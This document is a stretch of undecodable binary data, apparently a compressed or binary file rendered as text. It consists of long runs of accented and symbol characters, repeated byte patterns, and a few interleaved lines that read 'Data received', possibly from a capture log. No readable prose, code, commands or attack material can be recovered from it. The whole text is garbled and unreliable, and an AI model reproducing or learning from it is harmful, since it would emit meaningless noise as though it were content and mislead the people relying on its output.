[¡®ÐmP7èvèŽøéN¨;tÔê‰z÷‚î†zC÷@ããßJ ‰Ð$h24ª€¦BÓ éÐ h&„÷ i~ü„´Z-‚CK ¥Ð2höȕÐ*h5ô,´ŠB¤CdB„Pr Z ­ƒžƒž‡ÖCØk%ìµÒ‹ÐF¨ÚmÃ^þô:ôGh;ô'èÏÐèMè-èm(ué»toœµ°ó·Ç9P »{ìÚø°ãù°ãù°ãù°ãù°ãù°ãù°ãù°ãù°ãù°ãù°ãù°ãùÖãåhô"´ª„6A/A[âßú~ m…~½ýzú´ z zú#´zW„}ïA¿¶ù³Eº?ʅêByP¾HWçÄ¿UŸŠVç!½éåñ¯Ô§q&a ¸›­Á5´E5q uVQguV±K«/Ĩ ¸V %v¹Í¸ÿe|ö[\ß ýùW ÔSE=¹ûýù·pímÄïà³w¡÷ ÷¡"¬~ˆïÆ»Šw;µ Ÿý%~‚;å^Ô ïsêWxï,êa¤A×*èZýÂ;‹Šwï,ê? cP :Ž¶ˆDâßjA™Pm(/~"@…PTO„õ¡P1ÔX„AM ¦Ðeø¬âË!œ²œ®É]W„ƒ²H*òC*€‚P‚Ò¡0”E ZP&Tʂê@Ù"́r¡ºP”@…P„zQÏ êD=ƒ%PCè¨t!tQüÛàÅxGk]µ@¤¼ éŸwâÖH·ÚBWBW¡í ®Hßá=7x;ž»#¾=x'Ôº'~"øêù0îKÝ¥ñ¾Äûnp44u˜M„&áþYøn¬îÚK/G¹OC+ •òèç]|>Ãcxö§ø‰4?&•‚ñÃièÏ´âÚø¼ŽsgÇ •VŸåAùöã´¢Äß%+ÝãªñX¡‘Ñ^?ûù0|>–GIðÖá—;ÇïSn‹ÿtJüm ×¾Íå–ñCrk¨-tÔ9þ|KümùVè6PyÏø~ÐÅÇ ‹C½ão‡ú@3â‡B3¡YÐlèIhô„w¹Ð<h>´Z-‚CK ¥Ð2h9ô4´Z ­‚žVCÏBk (¤A:dÄ…/Ž jz\îwâx‡¾õ¡þ1¹]ü ê“o@<+þ™<ï.÷ŠK°]‚;ßÝ?êõ‚îƒúÅ? ‚†@àáÐHhF<†¶ÅжÚCÛbh[ m‹¡m1´-†¶ÅжÚCÛbh[ m‹¡m1´-†¶ÅжÚCÛbh[ m‹¡m1´-†¶ÅжÚCÛbh[,½Kü³ô[¡®ÐmP7èvèèÎøgh{ cØ6þŒÐ;2Ç1¾ƒ9l€¶;h·#ß_/÷‡†B³âÛÐÛïßh»ƒ¶;h»ƒ¶;hû6´}Ú¾ m߆¶oCÛ·…ÆÄׇÆBO@“¡iñõ¨×6Ôkêµ õچzmC½¶¡^ÛP¯mâzŒ@F  uû#P†úÀ :†t õü5كšìQzž9¦ô>Ã钁‘¹§KFçRï;f×1Ì®c¨ÝÔnj·µÛƒÚíAíö`dÊ02e™2ŒLF¦ #S†‘)ÃȔadÊ02e™2ŒLF¦ #S†‘)ÃȔadÊ02e™2ŒLF¦ #S†‘)ÃȔadÊ02e™2ŒLF¦ #S†؃؃؃؃؃؃؃؃‘)7 JÑ ¥‹7Ñ ¥7å΢Zß ­ïæý½õIï}ºz!½p9z!½p¹÷Wâ{0Vob¬ÞÄX½‰±z½Ñ ½Ñ ½Ñ ½Ñ ½Ñ ½Ñ ½QŠÞ(Eo”¢7JÑ¥èRôF)z£½QŠÞ(Eo”¢7JÑ¥èRôF)z£½QŠÞ(Eo”¢7JÑ¥èRôF)z£½QŠÞ(Eo”¢7JÑ¥èRôF7ôF7ôF7ôF7ôF7ôF7ôF7ôF7ôF©`.C‹Ãhñ´xZœ…N@ G‹|ôÑvôÏvôMú¦ ý…>ÈÂÕEhÿv´;Ú¿íߎöW¡ýUhÚ_…öW¡ýU¨GêQ…zT¡U¨GêQ…zT¡UX+eq;e¿;&.‘ïÄ×*Ã>7{Ü`h„²QãOÏîuã±gLŒ¿þDüPú8h<4šM‚&CS  h*4 šaoLÇޘŽ½1{c:öÆtìéØÓ±7¦coLÇޘŽ}1ûb:öÅtì‹éØÓ±/¦c_LǾIƒBP:ö¼ÄÎ~ˆuaÄ?ˆ5~ý–xOoŒ«»°vbíÄÚ=ˆµ{k÷ êCÝc¨{ u¡î1Ô=†ºÇP÷êCÝc¨{ u¡î1Ô=†ºÇP÷êCÝc¨{ u¡î1Ô=†ºÇP÷êCÝc¨{ u¡î1Ô=†ºÇP÷êžØ³zÇÿŠÞ~=üÚÙ=+Ñ¢OD+´¨×?ÇõÓÓÓ¸÷ÜĽéX)!´´VJ­máý è ŒÐiŒÐi´²­¬D++ÑÊJ´²­¬D++ÑÊJ´²­¬D++ÑÊJ´²­¬D++ÑÊJ´²­¬D++ÑÊJ´²­¬D++ÑÊJ´²­¬D++ÑÊJ´²­¬D++ÑÊJ´²R\–T`lv`lvÈe¢ã³-è‡ð#VÀq´d*ZR×ûËLÝÄ_fВe‰¿faìv`ìv`ìv`ìv`ìv UhUZUVU UhUZUVU UhUZUVU UhUZUVU UhUZUVU UhUZUVU UhUZUVU UhUZUVU UXǽ¹Ž¯D+Þ÷þ™ÓM¨õ"Ôz£HG{
Data received ßE{ßE[ßE»rЦ\Y‚ö¼‹ö¼‹ö¼‹ö¼‹ö¼+TùqŒë¨øòèø—òT̋§âGä%‰¿´ãÓSòÔøq!ÁMqÇqy fÄXhjü#yºÊ3ðôœø×òR‘!/ÿ$?ÿ)|›¾M¯Շ@ÅP Ôê{‚†@¡2h4 …†A@áG¡ÐcÐHèqh4…Êã?±=§PÓ/äññ¯Ð–òâøw2ÞôDyfûcÐãøt Z9šß)O‚&CS ©"GžAž‡ûæÇ?•@ ¡EÐòøoѾߦËñwÒÈù! @A( AéPʀ"P-èÿ¡î<ࣨÓÿÿ™Ý™Éf6´Ð{+`;AE=ìýÎv¢¨gá@PCñÎ^ÀFTN•¢„lȲ B’e3)¤,òý¿g²p (Šþîþ·y}vÚw¾å)Ÿçy¶d냠!hAcÐ4Í@sд”62´‘¡ mdh#CÚÈЎï-Sãû€ À…à"Ð\ .—‚?‚~à2p9¸\ ®÷³ŽÀƒ` øƒ‡À0< ÃÀpð(F‚Qà10<ƀ±r¹ð`9ۑb:RÜ©N•eØÒ?d9vR-nD Q´E5hÀ±°Dœ*"N-ªr)G‰0UD˜*"L¦ŠSE„©BúQ¤EúQ¤EúQ¤EúQ¤EúQ¤EúQ¤EúQ¤EúQ¤EúQ¤EúQ¤EúQ¤EúQ¤EúQ¤_ƒôk~ Ò¯Aú5H¿é× ý¢\Q®Š(WE”«"ÊU媈rUD¹*¤EºQ¤EºQ¤EºQ¤EºQ¤EºQ¤EºQ¤EºQ¤EºQ¤EºQ¤EºQ¤EºQ¤Åçú_LB¦ã±îˆ¤‡´s‘v‰†Œ“‘q2–^HËõÈ:Yç©c9N’EÜUŽåG°ü–Áò#èá zHFÉè¡L}Y®Ã2ñ€L< Èė~€¾EGè(%££dt”ŒŽ’ÑQ2:JFGÉè(%££dt”ŒŽ’ÑQ2:JFGÉè(%££dt”ŒŽ’ÑQ2:JFGÉè(%££dt”ŒŽ’ÑQ2:JFGÉè(å¡£<t”‡ŽòÐQ:ÊCGyxH‰à!<$‚‡DðÁC"xH‰à!<$‚‡DðÁC"è8'£ãdtœŒŽ“Ñq2:NFÇÉè8g ã tœŽ3Ðq:Î@Çè8g ã tœŽ3Ðq:Î@Çè8g ã tœŽ3Ðq:΃Ð`>ÌGƒ{Ñ÷×h±ͅÐÜ4g£9ÍÙhÎFÿúÿíEÐ^D}s/¡éÉòc4Xˆ Ñ`!,DƒÅh° ;Yw Åh1‚#h1‚#h1‚#h1-æ£Å|´˜óÑb>ZÌG‹ùh1-æ£Å|´˜óÑb>ZÌG‹ùh1-æ£Å|´˜óÑb>ZÌG‹ùh1-ÙhÉFK6Z²Ñ’–l´d£%-ÙhÉFK6Z²Ñ’–l´d£%-EÐR-EÐR-EÐR-EÐR-í@K;ÐÒ´´-í@K;ÐÒ´´-í@K;ÐÒ´´-í@K;ÐÒ´´-í@K;ÐÒ´´-í@K;ÐÒÑ-U¡¥*×ë´PÊÐB¨BNÝT†tːnÒ-CºeH· éV!Ý*¤[…t«nÒ­BºUH· éV!Ý*¤[…t«nÒ­BºUH· éV!Ý*¤[…t«nÒ­BºUH· éV!2¤S†tʐNÒ)C:eH§ 锉S`†0ü?B<÷©/°ŠY…;{ö§‚éÄûÄí–du­@kдí@{ÐÜO›Àƒ` ø ƒDÖÕȺYW#ëjd]¬«‘u5²®FÖÕȺYW#ëjd]¬«‘u5²®FÖÕâoȺY2ã3Žàa¼ Œ„ñ‚°+ÿC€Ü±|2xÕye㧭½}¢BôQˆ> ÑG!ú(D…è£}¢BôQˆ> ÑG!ú(D…è£}¢BôQˆ> ÑG!ú(D…è£ F` F` F` F`oã a¼!Œ7„ñ†0ÞÆÂxCoã a¼!Œ7„ñ†0ÞÆÂxCøxC …ÑP …ÑP …ÑP …ÑP …ÑP …ÑP …ÑP …ÑP …ÑP …ÑP …ÑP؍ñ¥î»ç¢«ºŠÀ6Ø&ÙG½#ã2Ž ã2Ž ã2Ž ã2Ž ã2Ž ã2Ž ã2Ž ã2Ž ã2Ž ã2Ž ã2Ž ã2Ž cgÖaÖaÖaÖaÖaÖaÖaÖ‰wlax ŒØkŒ°Æˆ¨Wí3XÚ ®§WÁ©U'òr÷ÇÈQ©Lñ6 oÓñ¶xZc<Í'®?Ì(£ˆÆI`<uù?ë9YŠe—Ò:Šo–+¸ë $\…„+ŽÈšJ±îR¬»ë.źK±îÒÿ۔b}¥X_)ÖWŠõ•b}¥X_)ÖWúš9ÕJI­;\·T-v.Š–ö‹[íd»ý£¿bdëT6!4áE¾È·Àå¿É¿Nð™ÒtÎ͐ȵ¹ ×äZ€\ kr݀\7 × Èur݀\7 × Èur݀\7 × Èur݀\7 × Èur݀\7 × Èur݀\7 × Èur݀McSÅØT16UŒMcSÅØT16UŒÜ {r/@îȽ¹ ÷ä^€Ü {r/@îȽ¹ ÷ä^€Ü {r/@îȽ¹ ÷ä^ï¬sx Œƒ1`¬,pe¼/æ QÑH]&š¨_‘q~]~#'ªëä|u/yF¥œ¬î“©Ì©Nõz¦\¬-óZùVQ_»MX±ÏZYr#›G¿‹À×xÀ72 ®ÁÒׂuŒ¹ží÷2KÝH¥`´ ¶[@¡ˆS‹ðÔJrÜ*2¡jP#Ë4!s4˜ 9Õÿ™2Oë)÷j½ÀYàY¥õ‘¹Ö=2b= S¬‡a=Âv˜Ì²†8ÁÇ6‰íx@mý1­—^iMæúkœƒû¬iO³ècžÜg- ÿÅ`‰Üký|¹¥/g˚¬TÎ¥Í “ã Èb?äЮXæX{AµÌñ'JÛß4T‡~ªC'Ζ)~rz?óò?#+ü/ɽþ7À 0WÚâê˜TCè)ŠT3‘j1R-Fªê.¤Dª™Hu/RÍDª™H³ i–#Ír$YŽ$ˑd9R܇+‘b%R¬D‚ÅH0„3‘`& !ÁL$D‚A$B‚ÁI0„‹‘`1,F‚A$B‚!$XŒ‹‘`&Ò+FzÅH¯éU"¹b$V‰Ä*‘X%’ªDR•HªI•#©r$UŽ¤Ê‘T9’*GRåHªI•#©Ì˜¤BHªIU"©J$U‰¤ÊEõC9N]&— ©dlp?z©ìQ·ËØÙ(µHÎÁºoU+È´÷ɋ°³o5M®Ñtù²fɇ±ö -Q¶×ڊµÎr$–ßA;C^ŠÔæbý—cs3µ‹äxíÙ?öé¬Úmòmív9X$W;Ÿ_bU+यˆ߀ur#îFÛ1ŸŠèµ”sé±_êƒ/]HEø!ûJ¦q—ã/?¸>R(Úp÷fîüŽ;w1·|æO×ΖîüJ~Ç
Data received ]»¹ëSîhÄ;o‡ë¿TÕ®·ÅOOçøL¹»r˜åÑËÚëÞ¹ËZ Öc1ßs÷F¬*@™Áv‹Ü…uìÂ:va»°ŒXÆN¬b'V±«Ø‹UìÅ"¢XD‹ˆb;±„(–Åv¡¹]hn/Zs˜¿P$0™Ïc¼÷sÖº¬—5È5yæ[Ë*ú/§ÿrú/·fpü–¬¢Ÿráá® fþ(wä:vO&ü!\²Œµ|#S9›¥¦Á#Ž ·Ë0rK£ßLúÍ·3êdZOħò\kù\&1zw–!‰$QCyHB"‰Š˜_U ‰ 5(ÑãR,)U`=>(К ¦ è(Gh@g¹G놞»ƒÓÑr×úrý÷³Ë=™MO|/éV Ý |/ W a‰„%¾—‡’´D“‘Äd$1ÿËCÚ5H»i× m‰ÿåáyH½©× ­$$_Ä’¬a¢E`¥a­aûHÁVÛ¸¶ƒíNúȕ#üB~ë÷ÊE~ =Ç]À`j’œŒæ¡ÍÿT™ëŸ¦ƒ7Ál¹HÄc‘åXc.š> ö9û„}¢õóðôƒxúA<ý ^}P´BŽ.«})²/å.Ž*ƒ£Êà¨2Ö^ÁÚ+X{ë.eÝ¥¬»”µ–²ÖRø¥ ~)ƒ[Êà–2¸¥ û.ƒ[ʘkó,…+ÊàŠ2¸¢Lñ1â$,`*Úÿí¿Šö_UW£Ñdð•\§®!*®ëä\¬`¿º™ól+(G©[å*5²@6ضËgÔlsA}îb› @¡˜„µ,UÃìï,¯˜­ Jäµ”±_öÊApS*Ì„¹ƒxð­pÔFu?×€ƒrµZËV… ‡¿<X›—}žòɉZ<û–êòY=¶õAÐ$Ê>Xë•Xë•Xë•ÄÖ§µr´Ö’k­@[ñ­=Û #œ× t–wj]8î ºqÜœÂþiàtùG8ò^˜åc´6 ­MBk“°öëà˗´sisøƒ|R;ŸmoÐGNÐ.`{!¸HޅW\©]Ìþ%òQ<ãÖØ'f?ÆCFkwˆfÚ0Hn‚_?²ÉTk0&÷ã%ûñWñýXÉ$¬dV2ɚÄõ'Á³à9ð<xQ4±^/ƒÉ´ƒsSÁ4Ž§ƒô3“ã·ØΑC­wÀ\0O>m½'GÍ&Xr¼|>–—ãU—á&`“°ÀIäOå&Xÿ’OZËÀ§´[ι•´[ÅþjÌù5¯ãüzúÝÀ¹ïÁœKA*}¥Í ö™´ ‚­\ Ø랄×^nm—«ðÜˉ¢ðÞ+ñÞË­<Îaƒ6híØ¡UŠä—vha‡V`ƒV (e0@9¨b?*W[û@ û6gas°ÂD?vçÇîüš\í÷°õÊQ°Ä(Xb”ßä8öðlÐoÉ/ý~À~=PŸó @CЈó‰2H¤éƒþ¦ô׌6ÍA д­iۖëí@{ÆïÀ96šèŸ SñðIþgD?ºö£k?ºö¿^/qí59ϟS]S]S] L‚­.÷ϤŸÙÌ{}Î¥ÿy¿ÞÈ¢=,ñ(,ñO72íÆóµ0A?Ͼ Ï^†×.Æk¿#æVâ±_à±yxeÞ¸/\¦ãu—áYð¤ÅxÌKxÌZ<¦/y/IÇ ’±þ÷°þ°þ/±~ç› çbñ›Ä_á«Ìä#"Öfu1Qjœð9疃¯‰sßpmÜ{n!r} g¹–‹™mÑkÑkü5™¯…§Š˜ùF¸h ³Â7¹ðM.3/€¯̼ÎÀÙød ³ÿ.ø.ø˜Yîg–rr¢×fë^˜ö¹Œ¶Œ¶™¶ ß,Æ7‹‰`›ñÏøg1þ¹ÿ\€. ‚m¶þÁ}OÀ‹r ¬¾V߂oÍ6Í6Ãð[`ø-øæ¢Ù2|s¾ô1vÿ1vþ16]D< OØm1%€­a§k°ËyØå<ìr¶X„­åbk¹ØZ.¶U„maW¹ØU.vµ†XÀ¦Öá–aS ˆp›‰[°yØGö‘K¹;H_‘¡­“Ÿ#é]D‡4láRØ<6ÏƾGª9H5©¦bŸÁÜۑìz˜:É®G²ë±=ØÆnØ86N‡Ó±‘Ó°‘jX6ˆ°•­ØI>̚³¦À¬)ØLlº œé0bŒ˜†Ôw!õ]H{ ˜¦Á€i0` ˜†dwÁzi°^L—£a±,‚Å‚°X ,–ƒa°­0ØVØj+l‚B°Sv ÁN)°S ì”;m…•B°R(ÆJ)°Q6 ÂFéhg=̒ ³d£¥õhh=ì²vÙƒl‡-²a‹l˜!fȆ²ÑT*šJES©°Âv M¥¢©T<?M­ÇóÓðø4<> OÃãÓðø4<>oOÁÛCx{oáí)x{oÏF‹©xy6^ž—gãåÙÔądÇN^}¶< ÎÁ˜:ë!<j:5ú=OÄkö¡×÷ÑëRôºo £×<ôº.B§‹ðˆ(^EÑÅD< Š>&bñQ¬|:V>+ŸŽ.&båQ¬<Š•OÇʧcÍû×"ä´kއ¬!«<d•‡UïC^yXò>ä³ù,E>K‘OÖ¼kއŒ–"£¥ÈgÖÅz§c¹ûXóRÖø| ‹­f«9ÚËÜ+å‡Øævт•íå(Ÿ•±²"VVʪRà0+Kae)Ìn/³Kav)Ìn/³KaV{™Ñ^fTȊ˜Q³ÙËlö2›"fSÄlR˜…Sˉ¶ŒTÉH[)Ÿ‘ò©:5j*£U0Z*£¥2Z%£¥2Z*£U2Z*²(GåŒZ‰,ʹ’‘ó9Ÿ‘ó‘E9£W2z%£ç3z>£§2ºSæS#l‡/÷ÊM¬z#W0b6\¶Æ̈́qúà3—quZUÄj¨pì;Lgj·‹^®är¸’Í•÷È©íö»rôÆî*ç(Bÿ[迌l8HNAÂ5¬Ó‡$ð’“êÀí9îfËRúØîj&ÖYDgŽ¢ }¬åÊçȯœ¾VÐb÷¡úލ7~1€ |r«º‰Õ܇ˑãvä¸9:õõväWÎV0‡µÌa-sX‹,®»[‚VGÔßíiß _ìÂv6íçpΩ¹Öl‹¦Ì¯Œ9•1§=ÌiOìœf_ļJ˜W ó(a%Ì¡„±Ë»Œ±ËwãîaÜ=Œ·‡ñö0V ã”1ÆщÞW²úoYùú#X6€œ?f¤*—U}î'EžŠér+«ä|¢çû°âõŒº’QW2êÊã2Ã4íiç°L¶c̦í#΍¢{ÉöQ[ëèõ9,öéŽMŒü÷£½˜÷vZ~†ÖR¨ ¶0ÿ/Òâ#ĉ A$5];qw7Қ´f³ž/èõz[„SÈݶ ÁÙHp6šLAŠ³ñˆ D£)¬ï ¼"È·³Æí¬q;ZM!ÛB¶…|kˏ˜#ˆ–SÐrÊaæhOälÖþëގ–S\öh‰Ô³z–ûjD%,²O~싑|3.fÆÎk8ÅH; ig1ËbfXŒ”³rRÎBÊYH9 )g!á,F*FÂYH7 éf!Ý,¤›…WUº5D?¬ «”_•(XC¦´Ohd#ë8*ã¨@´çȦ†‰’ŸØä'6‘²šHYM¤¬Ž½F&g)%ñÂDº0‘®šHWM¾%څÉÑ£ä69y”èVMt«&ºU“wGÉ»£D¶j"[5y‡Md “{ØDšj"M5Ñ¥ZÄË÷1“YÄn
Data received ›˜íäu»ÕFƒsÑà\—UâˆöZ"LrºŒ°‚"ZE´sD=†šGôdœ ðÐÏ.úq^s:+`Ŗû BØi$ñ§sd”óΫ²´à¾\ј#gõ¬¾‚ÕW¸+¿ƒ\a€Ì8b嬼Â]u*Û4°dlÀêXY+«`e¢£mD¾•È7ùfY™3v„Qò‘m%#ä3Bþájü÷¿|d[‰l3‘måQz&ÇA÷U@·RG¶™Œžl3¬Ö…ÂÊ+E'ÍÏ^¢œC¶d“-ÙdK6sú”9}Š´*ɘŠÈ˜œW׊‘Ó2# @ ÑÀBêȆԑΧ#¬§ˆ¬§ˆy}JvSDvSDvSDvSD6SD6SÄ|>%“)"‹±™Ó§dEdEdEdEÂ`6ÿd佌eĽŒ¶Ñ¾g´ïEG®îDnÌq+sÜJ˪ØkØÿÖÐ9dv}°ëKÃ<Y€ kaÍa-}¹¥/g»’LkÛ#µ–ÉqÒÞ6ÚäÐ>Wn=J‹MZRËAj9H*Iå0ï±×¤rHÉA9H#iä ¤‘ƒ4rD’ÈA 9H!)ä …тuncÛXã6ÖX¬15¦³Æt2UÇêÒYO:Ye˜¬2ÌZ¶‘Y:˜ÎZÒYK:™d˜u¤³ŽtÖ±5lc é¬!5¤»ß¢ì¨Ý-:Šéâ~9C<#äÛb¬|EŒO€$0äÉébÈå´Ù'§ˆ°å¥›LUºƒSÀ©à4p:8œ z€ž 8 œ Îç‚óÀÀù 7è.‚‹@_p1¸\ þúËÀåà p%¸ \ ®ׂëÀõà0H4U¾”_(_Éϔ¯Á7` X ÖÉÕÊzðؾ—«=sä+ž·Á; …ã``­žZ åo}9ÃÛPN÷’e{ɲ½dÙÞ¦ hrä+ÞmŠA©|EïÎCä }(x<FÉ·õÇr×'ËT=U®Ö©xŒ.rµÑt“ŸÝA/pÇ€;ät£? §ÓÀ<ÃñN ЙQ$ß6 „kWÉ)¦*SM x€è€LÑ$S4ã€Ä øA¨êƒ !hΗ«ÍÞànöd;‘ílçËÏÌJ™G_qÈï åFÑÀ~¢1hš‚® èN§‚kÀµà:p=¸Ün·‚¿€ûå,,w–; Ë/FÊÙbx Œƒ±r>Ö<kž5Ïǚç{ž—=/€ÁKàe0L¯€WÁkàuð˜ æpßÛà9­ÏòfʍÞl° ì9œßͶD¸^ J9wPnÔu`€8àÍ@sÐtÈAGXÇ|ýl¶ç²íÃö pî÷€!r–3 ˙…åÌÂrÆc9ãuÖ«³^,h¾ùˆ#ñŠL¯‚×Àëà 0¼>óÁð!ؾ?€°l© lé 2@äÉOà„Oà„Oà„ïÄ^P*A¨ûäbxb1<±žX O,öÊTOƒ= ¨N<6(¥  ”*Opî«R.Æß>1àß7ðu_7ðsãzùq3Û[À´éÈÅÆC£Àhð8x< žø›Œ dd #áO‹wÙÎc»˜íJ€ ä` 9àkŸàkŸàkŸàkŸàkßákß{@”poç‘~·X9CxDá:0€ â€Ä øAè-šˆ>à~9‡ÃÆGaヱñÁØø`l|06>XŒ¡‡±r(v>;ŠÅ·Š¿‹zâà)ð4x< žσÀ‹`¹h#V€<9ŽE£cÑèëht>Fç£Ñùht¾p~erŸLB«Ih5 ­&¡Õ$åM™¡Ì³À[`x¼ÞsÁ<ðx|æƒàC°|>‹Àb°ü|–‚É µ‡¨§öMÔ³ÙöWÊqêUr„z ¸‰ãAr’:XQCär¶k´þr$yÛ5ÚÝlGÊ Ú(™¦¥ ¯–&µt²Þ ªò-§åÉùÚ.r‘|ÑMÛͶÀùß@l÷ˆ†ž‘¢gx Œƒ1`,žI`<˜æÈ¡ðÅPøb¨g³¨çI¶€L[Adl° O¬= kO‚kÆyÈ ¬~,3Ô»Gøà—qðË8øe¨w¿h kÛÒ‚F #è.‡ê§°í ÎMà”¡úyì‘ãàqðÇ8øcü1 þ †?ëؒ>`Kú ™¡¿é~ƒ>Ãh ڀ¶ è ®—óñ´±xÚX<-É.ꏂ‰`xLãü¶ïˆ6xS’±ýÚï¹›Ãs^Çs^Çsæã9óbgØ „ö\Çþð $£ZÔ3e†Ù4MA3д-A+À\Mæj2W“¹šíAÐtÁ}ôu?x$q<LqŠÌðÝ.GøîIrˆoÀo|ø¿ñá7>üƇßø^/ƒÉ` `½¾WÁkàu𘠦é`x̳Àlð@>¾·Á;à]0Ìõâǁ'@&dlãŸøw<þÇãßñÌ3žyÆ3ÏxæÏ<ã™g<óŒgžñÌ3žyÆ3ÇxæÏã™c<sŒgŽñÌ1ž9Z§Šz qÀâáUۄ§äÁFΞó¿Gšª£a3 6³`3 6³`3ç·«,¸È‚Í,÷Ï@C"‘„ÈBd!2€@ˆ D"‘„`¾F0_#20™@˜L L&&“ „ÉÂda20™@˜L K„%’Åߤ-Áà!0 ƒGÀ00< FÈA0ê0uŒ: F£ƒMûÁ¦ý`Ó~°i?Ø´lêƒM}°©6õÁ¦>ØÔ›ú`SlêƒM}ÄÝlân6q7›¸›MÜÍ&îfw³…ózÇ|°|–‹æ0osâ¯Müµ‰¿6ñ×&þÚÄ_›økmâ¯Müµ‰¿6ñ×&þÚ°õpØz8l=\PË‚"{@”€RPÊå4˜ý}˜ý}˜ý}˜ý}˜ý}X} ¬>V«ÕǐÓÉéƒäôArú 9}œ>HN$§’ÓÉéƒäôArú 9}œ>HN$§’ÓÉéƒäôArú 9}œ>HN$§’ÓÉéƒäôArú 9}œ>HN$§’ÓÉéƒäôArú 9}œ>HN$§*7Š&ÊMàOàÏàf𦠉D¢‘(@$ ‰D¢‘(@$ ‰D¢‘(@$ ‰D¢‘(@$ ‰D¢‘(@$ ‰D¢‘(@$ ‰ÔK©%VQK¬¢–XE-±ŠZbµÄRj‰¥ÔK©%–RK,U~>%l›„(fÅ,¢˜¥öv¾£Êöl¯”ˆf×Í®w£YQnGD5u¨ŒÙ.$² &²]HdL->Y!?ÖVʯµd‘ }EôÛD=ŸFž.šåÂD9Mˤ¾¯‹t^"]'÷L†9¿‡È3RXD9‹(gå,¢œE”³ˆrQÎ"ÊYD9‹(gå,2é0™t˜L:L&&““I‡É¤ÃdÒa2é0™t˜L:L&&“{¦IÛ3Ìo‚™`˜ Þsd?"g?"g?ꮥÔ]K©»–E}DQQÔGõE}DQQÔGõE}DQQÔGõ‘gÚä™6y¦Mži“gÚä™6y¦Mži“gÚä™6y¦Mži“gڞJñTjû@ Ø|‚È<†È<†È<
Data received 1õe]š0@ ~ÏK¥j\ýTWØ´äp¿÷5¶Þ¦]0ó‚ŠÒz?cê[ÐnpÉû×û­½E˜ö}€Ú“¸ô¿|óefon®Wò¦¡=ZÁR+¾,øtAøÍC ÄÑ2¸‚ñ´cL_@\×Wö±£kÿ ¿Ä‰XmŽ´GÚ"Ž´u8ÒF8ÒiciÓiË8ÒÖåH[#íÇ9Æ6້¦|7ñYyƒ(ß«!cºÆt»À¾ÐŸwž0®sG»ã܉ÀpÓÝYî\w°Ürw•»ÖÝl·ÍÝéîq÷‡Àu»§Ü3î)Oy!/쎌Wh®©×Âkíµ:‚ëâuíôxƒ½aÞH` \Ž‡d’7˜A—³½yÞB`)¸ÕüŽÕÞ:`#cØâm÷v{Áð{¯x'¼ÓîQïlÈöZ„ŠC>”0CuC BfàZV 3ÔÆjt u õõõ †€šë794-434˜Zì½ZZZ¬m m ííí‚;::zȅŽ¹ˆ¥QQ)0ñ¢´·`Šê5,j4ת¨­7©¨й¨mQ7¯EQÏ¢>E=ݹôW뻪©.ê_4¨h(0ÜhÄ>®h"0E—QÑô¢Y€eKт¢%Àr­Ï¢UEk½ÓE´>‹6mvŠË¢=Eû‹G%”Ðâ¢ãE§€3’jwU±*á·Ö—âxq¦¸~qÆ=Tܨ¸iÕÚc¾ÕZªj]2_…êë5*,©æw¡†‘´˜/AM’ï@y{‹çyŠKùþÓìâuüÆÓvo<¿îtොP»ZŸÎJ=«ê¯Z=«vWb-—¯;½µšï=%åKO¨­Uj¤þÆ¿í$_qªrª[¬Jzý¤~^°FN㟖 ×uÐ]^2 +uÐ|Íirh}É̒9o­ƒ%óÅ5×Á’eE CkXåN¾á´^îJ6Iý,ÙZÔ¼dGÉnÚí“o4Uؕ,+9ZC»¶üJÓIÔÔùNSQ si)jòáÒ 4í.­'šPUÞ`Ú|ƒïr]Š£×'è÷˜\qa¾S¡×½èUošçN‘ësÙ¹’Äæºkmù>Ôâ›tçVÚò‹ Ö³´å»Hó}<~[Ãú2åŒWö0*óÕâצͬÐïLùvÕ¾”¶\'cϦ-Ww¨[ÈS¢W˜w£\Çbñ6×±è¯êY—PÂwn yý¾•ooõ9\®i±Ÿ¦ûߑò|›k$ôº ýžW¯<qø-A½žÁZ'4Ç´éuz×êØ\å’ç—UÔO)á:"·.ù5”kýw \ŸÍO‰Å¯‘¨oS¢ãÕkŠøfÙâêý~Ù¦nÝËÉó­±^¢ß;Û\ãp]Å/è•!Öß)çŠ[¯$Ôo¨õ»æ×h˕?6µ­ß\ëÕDúýµ¥×°­_rå~¯­¿Úá0v³6‰kxœ×)ù%oÀmêÍåÊG¯îÐkuXR.WéØ\…bVÅè/Øèõ!|ono£KêÜáŠ,Kñ@̀ëIô7ml–»Çrwø-›ë\Öp‡«Yô×E\êÖþoR~[@EÄấW^q¶åò­½MíÙür‹þ‹«WûpU£sÊV“g}@ Ú¹®óO¯¿Q™×ëXZÓV¯Ìáš´ Hôz*½úËÚB7zÁ0ámÖóõ†…”ëµ1—Š­Ëu\6׶¡•IhlÑVŽ® Ó+¦ÐÊäK½ŒKù^Çӆ?ª×_ÝÁиÂͬõâj½žÍÕ­€}‚^Gd±ßÈëVö(S®×Jé•oËD’F€„=€þŽ­ëW½Âö8k)¨«WÌê>ŠîY[l®€rt Ñk-ô*²×£^Ëô'j›­Éá$ýí —¾Bì÷l¶w¦©¥¢?^ÒÀ5W¡ÏÑ%Wè¹ì%Ì·•¸âÎeŸ£×e¡ÿm³èÕqû7~‘ÃÁ\w"ßNéÞQÁü`Öä8˜“· ¾  ÿ!­*VDÝó¥Â–T˜Øg!Î1æMÝÿ…Ÿ‰ Ó6æX\éÉÔI™Õ5)«°‘rí]Ãz±{jn¡ïŠ÷·mÿIÿ™‚Zy¤EµÔ·æʙdµÏ»¼C§Ýô?é¿zê.ÛÔ]þ.SW[ÿ²¢VVüZ&ö±èÛëså؍i‘ÖšF ä?-š 7µùGôÝú¯XeYÑKÞûõOVp…rØöÓ,Ã¥hü¶*B=©ÐÌ%AOԖ¦ÁõÁõªYÐuæ2êêr֜–•©u1?Ç·šfæú/ž^)Û1¸[r¤Uׄ±YMwՄñÿK­¼bÄÒ%¼â¢(áŠ4W”óʋ¢œ+R]ÑîÇÐ¥ÍHÕ¾çƒOÃå}Ê3ºŒ5©÷×ûn¬C+ÙSŽãþ¥ë¤ÚS«0;Kæ¿Ë/št‡ÔjÌ 'ðª銋&å¶b]=Ìú*i¾ïJó¿ÞÊMÇ*¶|¶˜#Êâ(ûÿ¯6d6ß5HjH#щ%{ُ|HµòÞ¬ÊqԑJ]YiêšrÕQuÔj,½¼åš§âtu¾ZuNS6ôö‘®.T¯^Q¯XMd ƸfãnÂGÚºÀx×ØjöQÍzG£¡+­±Rkõ\µÑ™§[¥ÕÜ´Kë£VY«šV¨³ú²ÚÖµcꘜ”,ÿK[Åý˜šø‘ÞÞ~–'Ø g­¶Z§æ€{oÖh;jZÏ 